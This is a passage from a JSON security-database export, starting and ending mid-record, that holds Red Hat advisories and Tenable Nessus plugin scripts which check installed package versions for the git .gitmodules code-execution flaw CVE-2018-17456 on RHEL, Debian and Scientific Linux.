repository is an exact copy with complete revision history. This not only allows the user to work on and contribute to projects without the need to have permission to push the changes to their official repositories, but also makes it possible for the user to work with no network connection.\n\nSecurity Fix(es):\n\n* git: arbitrary code execution via .gitmodules (CVE-2018-17456)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2018-10-30T19:08:46", "published": "2018-10-30T18:56:57", "id": "RHSA-2018:3408", "href": "https://access.redhat.com/errata/RHSA-2018:3408", "type": "redhat", "title": "(RHSA-2018:3408) Important: git security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-02-03T12:17:46", "bulletinFamily": "unix", "cvelist": ["CVE-2018-17456"], "description": "Git is a distributed revision control system with a decentralized architecture. As opposed to centralized version control systems with a client-server model, Git ensures that each working copy of a Git repository is an exact copy with complete revision history. This not only allows the user to work on and contribute to projects without the need to have permission to push the changes to their official repositories, but also makes it possible for the user to work with no network connection.\n\nSecurity Fix(es):\n\n* git: arbitrary code execution via .gitmodules (CVE-2018-17456)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2020-02-03T13:51:37", "published": "2020-02-03T13:18:58", "id": "RHSA-2020:0316", "href": "https://access.redhat.com/errata/RHSA-2020:0316", "type": "redhat", "title": "(RHSA-2020:0316) Important: git security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:46:22", "bulletinFamily": "unix", "cvelist": ["CVE-2018-17456"], "description": "Git is a distributed revision control system with a decentralized architecture. As opposed to centralized version control systems with a client-server model, Git ensures that each working copy of a Git repository is an exact copy with complete revision history. This not only allows the user to work on and contribute to projects without the need to have permission to push the changes to their official repositories, but also makes it possible for the user to work with no network connection.\n\nSecurity Fix(es):\n\n* git: arbitrary code execution via .gitmodules (CVE-2018-17456)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2018-11-12T16:00:53", "published": "2018-11-12T15:58:59", "id": "RHSA-2018:3541", "href": "https://access.redhat.com/errata/RHSA-2018:3541", "type": "redhat", "title": "(RHSA-2018:3541) Important: rh-git29-git security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2021-01-01T05:15:19", "description": "An update for git is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nGit is a distributed revision control system with a decentralized\narchitecture. As opposed to centralized version control systems with a\nclient-server model, Git ensures that each working copy of a Git\nrepository is an exact copy with complete revision history. This not\nonly allows the user to work on and contribute to projects without the\nneed to have permission to push the changes to their official\nrepositories, but also makes it possible for the user to work with no\nnetwork connection.\n\nSecurity Fix(es) :\n\n* git: arbitrary code execution via .gitmodules (CVE-2018-17456)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, and other related information, refer to the CVE page(s)\nlisted in the References section.", "edition": 24, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-10-31T00:00:00", "title": "RHEL 7 : git (RHSA-2018:3408)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-17456"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:git-svn", "p-cpe:/a:redhat:enterprise_linux:perl-Git", "p-cpe:/a:redhat:enterprise_linux:git-all", "p-cpe:/a:redhat:enterprise_linux:emacs-git-el", "p-cpe:/a:redhat:enterprise_linux:git", "p-cpe:/a:redhat:enterprise_linux:perl-Git-SVN", "p-cpe:/a:redhat:enterprise_linux:git-gui", "p-cpe:/a:redhat:enterprise_linux:git-gnome-keyring", "p-cpe:/a:redhat:enterprise_linux:gitk", "p-cpe:/a:redhat:enterprise_linux:git-cvs", "p-cpe:/a:redhat:enterprise_linux:gitweb", "cpe:/o:redhat:enterprise_linux:7", "p-cpe:/a:redhat:enterprise_linux:git-instaweb", "p-cpe:/a:redhat:enterprise_linux:git-hg", "p-cpe:/a:redhat:enterprise_linux:git-p4", "p-cpe:/a:redhat:enterprise_linux:git-bzr", "p-cpe:/a:redhat:enterprise_linux:git-debuginfo", "p-cpe:/a:redhat:enterprise_linux:git-daemon", "p-cpe:/a:redhat:enterprise_linux:git-email", "cpe:/o:redhat:enterprise_linux:7.6", "p-cpe:/a:redhat:enterprise_linux:emacs-git"], "id": "REDHAT-RHSA-2018-3408.NASL", "href": "https://www.tenable.com/plugins/nessus/118555", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2018:3408. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(118555);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/10/24 15:35:46\");\n\n script_cve_id(\"CVE-2018-17456\");\n script_xref(name:\"RHSA\", value:\"2018:3408\");\n\n script_name(english:\"RHEL 7 : git (RHSA-2018:3408)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for git is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nGit is a distributed revision control system with a decentralized\narchitecture. As opposed to centralized version control systems with a\nclient-server model, Git ensures that each working copy of a Git\nrepository is an exact copy with complete revision history. This not\nonly allows the user to work on and contribute to projects without the\nneed to have permission to push the changes to their official\nrepositories, but also makes it possible for the user to work with no\nnetwork connection.\n\nSecurity Fix(es) :\n\n* git: arbitrary code execution via .gitmodules (CVE-2018-17456)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, and other related information, refer to the CVE page(s)\nlisted in the References section.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2018:3408\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-17456\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Malicious Git HTTP Server For CVE-2018-17456');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:emacs-git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:emacs-git-el\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:git-all\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:git-bzr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:git-cvs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:git-daemon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:git-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:git-email\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:git-gnome-keyring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:git-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:git-hg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:git-instaweb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:git-p4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:git-svn\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:gitk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:gitweb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perl-Git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perl-Git-SVN\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/10/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/10/31\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2018:3408\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL7\", reference:\"emacs-git-1.8.3.1-20.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"emacs-git-el-1.8.3.1-20.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"git-1.8.3.1-20.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"git-1.8.3.1-20.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"git-all-1.8.3.1-20.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"git-bzr-1.8.3.1-20.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"git-cvs-1.8.3.1-20.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"git-daemon-1.8.3.1-20.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"git-daemon-1.8.3.1-20.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"git-debuginfo-1.8.3.1-20.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"git-debuginfo-1.8.3.1-20.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"git-email-1.8.3.1-20.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"git-gnome-keyring-1.8.3.1-20.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"git-gnome-keyring-1.8.3.1-20.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"git-gui-1.8.3.1-20.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"git-hg-1.8.3.1-20.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"git-instaweb-1.8.3.1-20.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"git-p4-1.8.3.1-20.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"git-svn-1.8.3.1-20.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"git-svn-1.8.3.1-20.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"gitk-1.8.3.1-20.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"gitweb-1.8.3.1-20.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"perl-Git-1.8.3.1-20.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"perl-Git-SVN-1.8.3.1-20.el7\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"emacs-git / emacs-git-el / git / git-all / git-bzr / git-cvs / etc\");\n }\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T01:48:46", "description": "joernchen of Phenoelit discovered that git, a fast, scalable,\ndistributed revision control system, is prone to an arbitrary code\nexecution vulnerability via a specially crafted .gitmodules file in a\nproject cloned with --recurse-submodules.", "edition": 24, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-10-09T00:00:00", "title": "Debian DSA-4311-1 : git - security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-17456"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:git", "cpe:/o:debian:debian_linux:9.0"], "id": "DEBIAN_DSA-4311.NASL", "href": "https://www.tenable.com/plugins/nessus/117957", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4311. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(117957);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/04/05 23:25:05\");\n\n script_cve_id(\"CVE-2018-17456\");\n script_xref(name:\"DSA\", value:\"4311\");\n\n script_name(english:\"Debian DSA-4311-1 : git - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"joernchen of Phenoelit discovered that git, a fast, scalable,\ndistributed revision control system, is prone to an arbitrary code\nexecution vulnerability via a specially crafted .gitmodules file in a\nproject cloned with --recurse-submodules.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/git\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/git\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2018/dsa-4311\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the git packages.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 1:2.11.0-3+deb9u4.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Malicious Git HTTP Server For CVE-2018-17456');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:git\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/10/09\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"9.0\", prefix:\"git\", reference:\"1:2.11.0-3+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"git-all\", reference:\"1:2.11.0-3+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"git-arch\", reference:\"1:2.11.0-3+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"git-core\", reference:\"1:2.11.0-3+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"git-cvs\", reference:\"1:2.11.0-3+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"git-daemon-run\", reference:\"1:2.11.0-3+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"git-daemon-sysvinit\", reference:\"1:2.11.0-3+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"git-doc\", reference:\"1:2.11.0-3+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"git-el\", reference:\"1:2.11.0-3+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"git-email\", reference:\"1:2.11.0-3+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"git-gui\", reference:\"1:2.11.0-3+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"git-man\", reference:\"1:2.11.0-3+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"git-mediawiki\", reference:\"1:2.11.0-3+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"git-svn\", reference:\"1:2.11.0-3+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"gitk\", reference:\"1:2.11.0-3+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"gitweb\", reference:\"1:2.11.0-3+deb9u4\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-05-15T20:45:27", "description": "Security Fix(es) :\n\n - git: arbitrary code execution via .gitmodules\n (CVE-2018-17456)", "edition": 1, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-02-04T00:00:00", "title": "Scientific Linux Security Update : git on SL6.x i386/x86_64 (20200203)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-17456"], "modified": "2020-02-04T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:git-svn", "p-cpe:/a:fermilab:scientific_linux:emacs-git-el", "p-cpe:/a:fermilab:scientific_linux:git-email", "p-cpe:/a:fermilab:scientific_linux:gitk", "p-cpe:/a:fermilab:scientific_linux:git-all", "p-cpe:/a:fermilab:scientific_linux:git-debuginfo", "p-cpe:/a:fermilab:scientific_linux:git-daemon", "p-cpe:/a:fermilab:scientific_linux:git", "x-cpe:/o:fermilab:scientific_linux", "p-cpe:/a:fermilab:scientific_linux:git-gui", "p-cpe:/a:fermilab:scientific_linux:perl-Git", "p-cpe:/a:fermilab:scientific_linux:gitweb", "p-cpe:/a:fermilab:scientific_linux:emacs-git", "p-cpe:/a:fermilab:scientific_linux:git-cvs"], "id": "SL_20200203_GIT_ON_SL6_X.NASL", "href": "https://www.tenable.com/plugins/nessus/133447", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(133447);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/02/24\");\n\n script_cve_id(\"CVE-2018-17456\");\n\n script_name(english:\"Scientific Linux Security Update : git on SL6.x i386/x86_64 (20200203)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security Fix(es) :\n\n - git: arbitrary code execution via .gitmodules\n (CVE-2018-17456)\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind2002&L=SCIENTIFIC-LINUX-ERRATA&P=79\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?759bc541\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Malicious Git HTTP Server For CVE-2018-17456');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:emacs-git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:emacs-git-el\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:git-all\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:git-cvs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:git-daemon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:git-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:git-email\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:git-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:git-svn\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:gitk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:gitweb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:perl-Git\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/10/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/02/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/02/04\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 6.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL6\", reference:\"emacs-git-1.7.1-10.el6_10\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"emacs-git-el-1.7.1-10.el6_10\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"git-1.7.1-10.el6_10\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"git-all-1.7.1-10.el6_10\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"git-cvs-1.7.1-10.el6_10\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"git-daemon-1.7.1-10.el6_10\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"git-debuginfo-1.7.1-10.el6_10\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"git-email-1.7.1-10.el6_10\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"git-gui-1.7.1-10.el6_10\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"git-svn-1.7.1-10.el6_10\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"gitk-1.7.1-10.el6_10\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"gitweb-1.7.1-10.el6_10\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"perl-Git-1.7.1-10.el6_10\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"emacs-git / emacs-git-el / git / git-all / git-cvs / git-daemon 